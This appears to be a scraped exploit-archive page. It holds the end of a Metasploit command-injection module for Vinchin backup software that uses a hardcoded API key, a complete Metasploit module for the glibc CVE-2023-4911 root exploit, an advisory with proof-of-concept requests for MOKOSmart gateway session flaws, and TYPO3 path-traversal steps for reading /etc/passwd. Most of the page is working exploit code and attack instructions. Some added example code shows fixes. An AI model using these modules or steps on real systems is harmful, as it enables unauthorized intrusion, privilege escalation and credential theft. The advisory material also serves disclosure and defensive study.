hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),<br /> ]<br /> )<br /> end<br /><br /> def exploit<br /> hex_encoded_payload = payload.encoded.unpack('H*').first<br /> formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join<br /><br /> temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"<br /> command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),<br /> 'vars_get' => {<br /> 'm' => '30',<br /> 'f' => 'checkIpExists',<br /> 'k' => datastore['APIKEY']<br /> },<br /> 'data' => "p={\"ip\":\"a||#{command}\"}"<br /> })<br /> end<br /><br /> def check<br /> target_uri_path = normalize_uri(target_uri.path, 'login.php')<br /> res = send_request_cgi('uri' => target_uri_path)<br /><br /> return CheckCode::Unknown('Failed to connect to the target.') unless res<br /> return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/<br /> version_match = res.body.match(version_pattern)<br /><br /> unless version_match && version_match[1]<br /> return CheckCode::Unknown('Unable to extract version.')<br /> end<br /><br /> version = Rex::Version.new(version_match[1])<br /> print_status("Detected Vinchin version: #{version}")<br /><br /> if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||<br /> (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||<br /> (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||<br /> (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))<br /> return CheckCode::Appears<br /> else<br /> return CheckCode::Safe<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> # includes: is_root?<br /> include Msf::Post::Linux::Priv<br /> # includes: kernel_release<br /> include Msf::Post::Linux::Kernel<br /> # include: get_sysinfo<br /> include Msf::Post::Linux::System<br /> # includes writable?, upload_file, upload_and_chmodx, exploit_data, cd<br /> include Msf::Post::File<br /> # includes register_files_for_cleanup<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> BUILD_IDS = {<br /> '69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,<br /> '3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,<br /> 'a99db3715218b641780b04323e4ae5953d68a927' => 561,<br /> 'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,<br /> '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,<br /> '9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,<br /> 'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,<br /> '956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322<br /> }<br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',<br /> 'Description' => %q{<br /> A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES<br /> environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when<br /> launching binaries with SUID permission to execute code in the context of the root user.<br /><br /> This module targets glibc packaged on Ubuntu and Debian. 
The specific glibc versions this module targets are:<br /><br /> Ubuntu:<br /> 2.35-0ubuntu3.4 > 2.35<br /> 2.37-0ubuntu2.1 > 2.37<br /> 2.38-1ubuntu6 > 2.38<br /><br /> Debian:<br /> 2.31-13-deb11u7 > 2.31<br /> 2.36-9-deb12u3 > 2.36<br /><br /> Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911<br /> however this module does not target them.<br /> },<br /> 'Author' => [<br /> 'Qualys Threat Research Unit', # discovery<br /> 'blasty <peter@haxx.in>', # PoC<br /> 'jheysel-r7' # msf module<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-4911'],<br /> ['URL', 'https://haxx.in/files/gnu-acme.py'],<br /> ['URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],<br /> ['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],<br /> ['URL', 'https://ubuntu.com/security/CVE-2023-4911']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => [ 'linux', 'unix' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'PrependSetresgid' => true,<br /> 'PrependSetresuid' => true,<br /> 'WfsDelay' => 600<br /> },<br /> 'DisclosureDate' => '2023-10-03',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /> register_advanced_options([<br /> OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])<br /> ])<br /> end<br /><br /> def find_exec_program<br /> %w[python python3].select(&method(:command_exists?)).first<br /> rescue StandardError => e<br /> fail_with(Failure::Unknown, "An error occurred finding a version of python to use: #{e.message}")<br /> end<br /><br /> def check<br /> glibc_version = cmd_exec('ldd 
--version')&.scan(/ldd\s+\(\w+\s+GLIBC\s+(\S+)\)/)&.flatten&.first<br /> return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version<br /><br /> sysinfo = get_sysinfo<br /> case sysinfo[:distro]<br /> when 'ubuntu'<br /> # Ubuntu's version looks like: 2.35-0ubuntu3.4. The following massaging is necessary for Rex::Version compatibility<br /> test_version = glibc_version.gsub(/-\d+ubuntu/, '.')<br /> if Rex::Version.new(test_version).between?(Rex::Version.new('2.35'), Rex::Version.new('2.35.3.4')) ||<br /> Rex::Version.new(test_version).between?(Rex::Version.new('2.37'), Rex::Version.new('2.37.2.1')) ||<br /> Rex::Version.new(test_version).between?(Rex::Version.new('2.38'), Rex::Version.new('2.38.6'))<br /> return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")<br /> end<br /> when 'debian'<br /> # Debian's version looks like: 2.36-9+deb12u1. The following massaging is necessary for Rex::Version compatibility<br /> test_version = glibc_version.gsub(/\+deb/, '.').gsub(/u/, '.').gsub('-', '.')<br /> if Rex::Version.new(test_version).between?(Rex::Version.new('2.31'), Rex::Version.new('2.31.13.11.7')) ||<br /> Rex::Version.new(test_version).between?(Rex::Version.new('2.36'), Rex::Version.new('2.36.9.12.3'))<br /> return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")<br /> end<br /> else<br /> return CheckCode::Unknown('The module has not been tested against this Linux distribution')<br /> end<br /> CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")<br /> end<br /><br /> def check_ld_so_build_id<br /> # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so<br /> if !command_exists?('file')<br /> print_warning('Unable to locate the `file` command in order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')<br /> return<br /> end<br /> file_cmd_output = ''<br /><br /> # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not<br /> # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig installed by default.<br /> sysinfo = get_sysinfo<br /> case sysinfo[:distro]<br /> when 'ubuntu'<br /> if command_exists?('ldconfig')<br /> file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')<br /> end<br /> when 'debian'<br /> file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')<br /> else<br /> fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')<br /> end<br /><br /> if file_cmd_output =~ /BuildID\[.+\]=(\w+),/<br /> build_id = Regexp.last_match(1)<br /> if BUILD_IDS.keys.include?(build_id)<br /> print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")<br /> else<br /> fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")<br /> end<br /> else<br /> print_warning('Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')<br /> end<br /> end<br /><br /> def exploit<br /> fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?<br /><br /> python_binary = find_exec_program<br /> fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary<br /> vprint_status("Using '#{python_binary}' to run the exploit")<br /><br /> check_ld_so_build_id<br /><br /> # The python script assumes the working directory is the one we can write to.<br /> cd(datastore['WritableDir'])<br /> shell_code = payload.encoded.unpack('H*').first<br /><br /> exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py')<br /> exploit_data = exploit_data.gsub('METASPLOIT_SHELL_CODE', shell_code)<br /> exploit_data = 
exploit_data.gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))<br /><br /> # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully<br /> output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")<br /> if output.blank?<br /> print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')<br /> else<br /> print_line(output)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># MOKOSmart MKGW1 Gateway Improper Session Management #<br /><br />Link: https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220120-01_MOKOSmart_MKGW1_Gateway_Improper_Session_Management<br /><br />## Vulnerability Overview ##<br /><br />MOKOSmart MKGW1 Gateway devices with firmware version 1.1.1 or below do<br />not provide adequate session management for the administrative web<br />interface. This allows adjacent attackers with access to the management<br />network to read and modify the configuration of the device.<br /><br />* **Identifier** : SBA-ADV-20220120-01<br />* **Type of Vulnerability** : Improper Authentication<br />* **Software/Product Name** : [MOKOSmart MKGW1 BLE Gateway](https://www.mokosmart.com/mokosmart-mkgw1-gateway-iot-cloud-platform/)<br />* **Vendor** : [MOKO TECHNOLOGY LTD](https://www.mokosmart.com/)<br />* **Affected Versions** : <= 1.1.1<br />* **Fixed in Version** : Not yet<br />* **CVE ID** : Pending<br />* **CVSS Vector** : CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H<br />* **CVSS Base Score** : 8.0 (High)<br /><br />## Vendor Description ##<br /><br />> * MKGW1 Bluetooth gateway is mainly used for the MOKO Bluetooth products.<br />> * It is convenient for users to get the data of the MOKO series Beacon,<br />> and advertising raw data of any Bluetooth device.<br />> * It can upload the data to the server via MQTT (V3.1.1) or HTTP(S)<br />> protocol.<br />> * MKGW1 was developed with MediaTek® MT7688AN relying on OpenWrt system<br />> and Nordic® nRF52 platform.<br />> * MKGW1 can connect the standard MQTT Broker, Aws IOT, Azure IOT HUB,<br />> Aliyun IOT.<br /><br />Source: <http://doc.mokotechnology.com/index.php?s=/page/108><br /><br />## Impact ##<br /><br />By exploiting the documented vulnerability, an attacker can gain<br />administrative access to the device. 
For example, this can be misused by<br />altering the configuration of the device or by reading out the configured<br />network credentials and therefore getting a foothold in the victim's network.<br /><br />## Vulnerability Description ##<br /><br />The gateway offers a web-based configuration interface that can be used to<br />edit the configuration of the gateway. Username and password are requested<br />to authenticate the administrator. After sending the correct credentials the<br />device sets a global server-side state to "logged in" for 3600 seconds,<br />rather than issuing a session ID. Now any device on the same network can<br />access the configuration interface as administrator without any additional<br />authentication and read and modify the configuration.<br /><br />## Proof of Concept ##<br /><br />Login with the admin credentials on the web interface from a legitimate<br />client:<br /><br />HTTP request:<br /><br />```http<br />POST /goform/login HTTP/1.1<br />Host: 192.168.22.1<br />Content-Type: application/json<br />Content-Length: 39<br />Origin: http://192.168.22.1<br />Connection: close<br />Referer: http://192.168.22.1/sign_in<br /><br />{"username":"Admin","password":"[redacted]"}<br />```<br /><br />HTTP response:<br /><br />```http<br />HTTP/1.1 200 OK<br />Content-type: application/json<br />Pragma: no-cache<br />Cache-Control: no-cache<br /><br />{ "state": { "code": 2000, "msg": "ok" }, "data": { "activetime": "3600" } }<br />```<br /><br />The response shown above does not contain any session identifier.<br />On another client that can reach the web interface, an attacker can read out<br />the configuration without any authentication:<br /><br />HTTP request:<br /><br />```http<br />GET /goform/get_wan HTTP/1.1<br />Host: 192.168.22.1<br />Connection: close<br />```<br /><br />HTTP response:<br /><br />```http<br />HTTP/1.1 200 OK<br />Content-type: application/json<br /><br />{ "state": { "code": 2000, "msg": "ok" }, "data": { 
"wanmode": "WIFI", "wanssid": "[redacted]", "wanencrypt": "[redacted]", "wanpassword": "[redacted]", "proto": "dhcp", "ipaddr": "", "netmask": "", "gateway": "", "firdns": "", "secdns": "" } }<br />```<br /><br />The above proof-of-concept shows that the MOKO gateway cannot distinguish<br />between multiple sessions. Therefore, if a legitimate client is logged in,<br />an attacker can read the configuration. Furthermore, an attacker can also<br />modify the configuration by sending the appropriate `JSON` data to the<br />respective `POST` endpoint. Changes to the network can trigger a reboot<br />of the device.<br /><br />## Recommended Countermeasures ##<br /><br />We are not aware of a vendor fix yet. Please contact the vendor.<br /><br />We recommend implementing proper session management for the<br />administrative web interface of the device.<br /><br />## Timeline ##<br /><br />* `2022-01-20`: identification of vulnerability in version 1.1.1<br />* `2022-01-27`: initial vendor contact<br />* `2022-03-02`: disclosed vulnerability to vendor contact but received no reply<br />* `2023-12-11`: request CVE from MITRE<br />* `2023-12-12`: public disclosure<br /><br />## References ##<br /><br />* [Moko Gateway Documentation](https://www.mokosmart.com/wp-content/uploads/2019/10/GS-gateway.pdf)<br /><br />## Credits ##<br /><br />* Jakob Hagl ([SBA Research](https://www.sba-research.org/))<br />* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))<br /></code></pre>
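The global "logged in for 3600 seconds" flag described in the MKGW1 advisory above, modelled beside a per-client session design as an added example (not MOKO firmware code); the credentials, timestamps and the way the token is returned are constructed assumptions.

```python
import secrets

ACTIVE_TIME = 3600                        # the "activetime" the device reports after login
CREDENTIALS = ("Admin", "correct-horse")  # constructed; the advisory redacts the real password


class GlobalFlagAuth:
    """Vulnerable design: login flips one server-wide flag that every client then shares."""
    def __init__(self):
        self.logged_in_until = 0.0

    def login(self, username, password, now):
        if (username, password) != CREDENTIALS:
            return None
        self.logged_in_until = now + ACTIVE_TIME
        return {"activetime": str(ACTIVE_TIME)}  # no session identifier, as in the advisory

    def get_wan(self, now, token=None):
        # Nothing identifies the caller: any host on the LAN passes while the flag is set.
        return 200 if now < self.logged_in_until else 401


class SessionTokenAuth:
    """Hardened design: login mints a random per-client token with its own expiry."""
    def __init__(self):
        self.sessions = {}  # token -> expiry timestamp

    def login(self, username, password, now):
        if (username, password) != CREDENTIALS:
            return None
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, not guessable
        self.sessions[token] = now + ACTIVE_TIME
        return {"activetime": str(ACTIVE_TIME), "token": token}

    def get_wan(self, now, token=None):
        expiry = self.sessions.get(token)
        if expiry is None:
            return 401
        if now >= expiry:
            del self.sessions[token]  # purge expired sessions rather than keep them around
            return 401
        return 200


def demo():
    """Two-client replay: (vuln other client, fixed other client, fixed admin, fixed admin expired)."""
    t0 = 1_700_000_000.0
    vuln, fixed = GlobalFlagAuth(), SessionTokenAuth()
    vuln.login(*CREDENTIALS, t0)
    tok = fixed.login(*CREDENTIALS, t0)["token"]
    return (vuln.get_wan(t0 + 10), fixed.get_wan(t0 + 10),
            fixed.get_wan(t0 + 10, tok), fixed.get_wan(t0 + ACTIVE_TIME, tok))
```

The captured requests show the interface served over plain HTTP, so a token alone still travels in the clear past the same adjacent attacker; the session fix belongs together with TLS on the management interface.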
<pre><code># Exploit Title: TYPO3 11.5.24 Path Traversal Vulnerability (Authenticated)<br /># Date: Apr 9, 2023<br /># Exploit Author: Saeed reza Zamanian<br /># Software Link: https://get.typo3.org/release-notes/11.5.24<br /># Version: 11.5.24<br /># Tested on: Kali 2022.3<br /># CVE : CVE-2023-30451<br /><br /><br /> In TYPO3 11.5.24, the filelist component allows attackers with access to the administrator panel<br /> to read arbitrary files by using a directory traversal via the baseuri field. This is demonstrated through:<br /> POST /typo3/record/edit with ../../../ and the parameter<br /> data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF].<br /> <br />-----------------------------------------------------<br />To exploit this vulnerability, follow these steps:<br /><br />1. Log in to the administrator panel.<br />2. Navigate to the 'file' > 'Filelist' section.<br />3. Right-click on a file storage and select 'New.'<br />4. Set the base URI to "../../../" and save.<br /><br />After creating the file storage, the final HTTP request should resemble the one below. Once the file storage is created, refresh the page, enabling you to browse any directory on the server.<br /><br />To access "/etc/passwd," browse to the '/etc/' directory, search for 'passwd,' and view the file.<br /></code></pre>
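A server-side check for the storage basePath field discussed in the TYPO3 entry above, written here as an added example in Python rather than in TYPO3's PHP; the project root /var/www/html and the function names are assumptions, not TYPO3's own code.

```python
import posixpath

# Constructed stand-in for the web root a storage may not leave; not TYPO3's real layout.
PROJECT_ROOT = "/var/www/html"


def validate_storage_base_path(base_path: str, project_root: str = PROJECT_ROOT) -> str:
    """Normalise a relative storage basePath and confirm it stays inside project_root.

    Returns the normalised absolute directory, or raises ValueError when the value is
    absolute, contains a NUL byte, or climbs out of the root via "..".
    """
    if "\x00" in base_path:
        raise ValueError("NUL byte in basePath")
    if base_path.startswith("/"):
        raise ValueError("absolute basePath not allowed for a relative storage")
    root = posixpath.normpath(project_root)
    candidate = posixpath.normpath(posixpath.join(root, base_path))
    # normpath collapses "x/../y" and cannot climb above "/", so a traversal that escapes
    # the root ends up as a sibling or ancestor path. Compare on a directory boundary so
    # "/var/www/html2" is not mistaken for something under "/var/www/html".
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError(f"basePath {base_path!r} escapes {root}")
    return candidate


def check_examples() -> dict:
    """Run the advisory's payload and some legitimate values through the check.

    Returns each input mapped to its resolved directory, or None when it was rejected.
    """
    cases = [
        "fileadmin/",               # TYPO3's usual default storage
        "fileadmin/user_upload",    # nested but still inside the root
        "./fileadmin/./",           # harmless dot segments
        "../../../",                # the value from the advisory: climbs to "/"
        "fileadmin/../../etc",      # traversal hidden behind a legitimate prefix
        "../html2",                 # sibling directory that shares the root's prefix
        "/etc/",                    # absolute path
    ]
    results = {}
    for case in cases:
        try:
            results[case] = validate_storage_base_path(case)
        except ValueError:
            results[case] = None
    return results
```

On a real filesystem, apply os.path.realpath to the accepted directory as well, so a symlink placed inside the project root cannot point outside it.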